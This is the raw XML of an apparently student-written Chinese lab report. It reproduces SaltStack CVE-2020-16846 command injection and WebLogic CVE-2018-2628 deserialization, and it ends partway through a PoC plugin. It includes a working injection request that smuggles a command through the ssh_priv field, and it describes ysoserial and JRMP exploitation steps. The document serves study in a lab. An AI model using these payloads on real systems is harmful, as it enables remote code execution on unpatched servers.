        <w:t>POST /run HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>Host: 127.0.0.1:8000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="480" w:leftChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>Accept: application/x-yaml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>Accept-Language: en-US,en;q=0.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>DNT: 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Length: 87</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>token=12312&amp;client=ssh&amp;tgt=*&amp;fun=a&amp;roster=whip1ash&amp;ssh_priv=aaa|touch%20/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360success</w:t>
      </w:r>
      <w:r>
        <w:t>%3b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2044065"/>
            <wp:effectExtent l="0" t="0" r="4445" b="381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line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="240" w:firstLineChars="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中，token=12312&amp;client=ssh&amp;tgt=*&amp;fun=a&amp;roster=whip1ash&amp;ssh_priv=aaa：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一组URL参数，用于向服务器发送请求时提供信息的键值对。具体意义可能取决于服务器端的实现，但包括了一个标识符(token)、客户端类型(client)、目标(tgt)、功能(fun)、花名册(roster)和SSH私钥(ssh_priv)。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="240" w:firstLineChars="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而在URL参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|touch%20/tmp/360</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%3b：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，| 表示管道符号，用于将前面的命令的输出作为后面命令的输入。而 %20 和 %3b 是 URL 编码中的空格和分号字符。因此，这部分的意思是在执行前面的命令后，通过ssh_priv参数执行一个 touch 命令来创建一个 /tmp/360 文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后进入容器中查看是否执行成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5057775" cy="662305"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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      发现文件注入成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/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</w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2018-2628</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WebLogic Server 10.3.6环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(此处使用了docker)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Python 2.7.x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2819400" cy="809625"/>
            <wp:effectExtent l="0" t="0" r="0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宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Oracle Java SE 1.7+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4905375" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="9525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宋体" w:hAnsi="宋体" w:cs="宋体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  <w:t>靶机ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>：192.168.188.128</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>主机ip:192.168.188.129</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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漏洞复现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776605"/>
            <wp:effectExtent l="0" t="0" r="0" b="1079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60" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>启动JRMP Server，触发漏洞后目标靶机服务器可以远程调用执行特定的程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体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这里使用了ysoserial.exploit.JRMPListener,1099为监听的端口号，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touch /tmp/okkkkkkkkkkkkk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为要在靶机上远程执行的命令，此处以在tmp文件目录下新建一个okkkkkkkk名称的目录为例</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="301625"/>
            <wp:effectExtent l="0" t="0" r="1270" b="317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依据本机的ip和监听的端口号信息生成payload字符串，为一串16进制编码的二进制输出数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60985"/>
            <wp:effectExtent l="0" t="0" r="10795" b="5715"/>
            <wp:docPr id="18" name="图片 18" descr="348d730b9ee04261f1bd1940396ef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48d730b9ee04261f1bd1940396ef8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default" w:eastAsia="宋体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919855"/>
            <wp:effectExtent l="0" t="0" r="1905" b="4445"/>
            <wp:docPr id="16" name="图片 16" descr="761b588b2b9140a86d865da21313f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761b588b2b9140a86d865da21313f6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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>将poc脚本中的payload手动替换为该字符串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648335"/>
            <wp:effectExtent l="0" t="0" r="12065" b="12065"/>
            <wp:docPr id="20" name="图片 20" descr="2112d83f5b61f0c2da7c5fa4f11a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112d83f5b61f0c2da7c5fa4f11a54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运行poc脚本向靶机发送socket包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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-142240</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-7266940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5501005" cy="3014980"/>
            <wp:effectExtent l="0" t="0" r="10795" b="7620"/>
            <wp:wrapTopAndBottom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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>使用wireshock追踪tcp流，验证按照t3协议发送了包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4067175" cy="2466975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>监听的返回信息如上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047750"/>
            <wp:effectExtent l="0" t="0" r="12065" b="635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在靶机目录中发现存在okkkkkkkkkkkkk目录即为攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>漏洞利用过程分析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RMI过程基础分析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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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-478790</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>20955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4432300" cy="3349625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:wrapTopAndBottom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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>T3协议的内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2352675" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>发送的第一个包为T3协议头，HELO后面的内容则是被攻击方回应的weblogic版本号，在发送请求包头后会进行一个返回weblogic的版本号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879725"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>JAVA序列化数据的前4个字节为“AC ED 00 05”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>，找到</w:t>
      </w:r>
      <w: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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>这一部分就是java序列化生成的恶意代码部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>，这部分</w:t>
      </w:r>
      <w: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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>T3协议接收过来的数据会在weblogic.rjvm.InboundMsgAbbrev#readObject这里进行反序列化操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="3700780"/>
            <wp:effectExtent l="0" t="0" r="1270" b="7620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cs="Times New Roman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cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>这是反序列化的执行流程图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman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cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>resolveClass 用于根据类描述符返回相应的类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman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cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>resolveProxyClass 用于返回实现了代理类描述符中所有接口的代理类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>如果在</w:t>
      </w:r>
      <w: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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>resolveClass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>和resolveProxyClass</w:t>
      </w:r>
      <w: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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>方法中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>没</w:t>
      </w:r>
      <w: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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>做任何的校验，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>就会</w:t>
      </w:r>
      <w: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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>导致漏洞产生</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman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cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>一种防御的机制：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42305" cy="1708150"/>
            <wp:effectExtent l="0" t="0" r="10795" b="6350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i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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5"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>resolveProxyClass是处理rmi接口类型的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>只判断了java.rmi.registry.Registry，找一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>其他的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rmi接口即可绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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5"/>
          <w:kern w:val="2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF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5"/>
          <w:kern w:val="2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>在前面的生成payload命令中，使用的是JRMPClient2类,利用的是java.rmi.activation.Activator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="5"/>
          <w:kern w:val="2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>，所以最终能够攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2962275" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="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73075"/>
            <wp:effectExtent l="0" t="0" r="11430" b="9525"/>
            <wp:docPr id="4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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc28030"/>
      <w:bookmarkStart w:id="30" w:name="_Toc28445"/>
      <w:bookmarkStart w:id="31" w:name="_Toc10303"/>
      <w:bookmarkStart w:id="32" w:name="_Toc75461104"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试中所用的工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>虚拟机kali-purple、docker容器（Version: 20.10.23+dfsg1）、</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp Suite Professional v2023.4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w: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2"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>wireshock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="34" w:name="_Toc19260"/>
      <w:bookmarkStart w:id="35" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="36" w:name="_Toc12892"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（25分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="156" w:after="156"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc32666"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2020-16846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TestPOC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POCBase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vulID = '0'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cveID = 'CVE-2020-16846,CVE-2020-25592'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cnvdID = ''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cnnvdID = ''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version = '1'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author = ''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vulDate = '2020-08-04'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createDate = '2023-07-20'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updateDate = '2023-07-20'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name = 'SaltStack多个高危漏洞 Poc'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desc = ''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solution = ''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severity = '高危'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vulType = '命令执行'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taskType = ''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references = ['https://docs.saltstack.com/en/latest/ref/netapi/all/salt.netapi.rest_cherrypy.html']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appName = 'SaltStack'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appVersion = ''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appPowerLink = ''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samples = []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install_requires = []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_attack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_verify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_verify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parse_ip_port(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.target,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 修改端口号为80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{}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'Content-Type'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'application/x-www-form-urlencoded; charset=UTF-8'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'token=12312&amp;client=ssh&amp;tgt=*&amp;fun=a&amp;roster=whip1ash&amp;ssh_priv=aaa|touch%20/tmp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
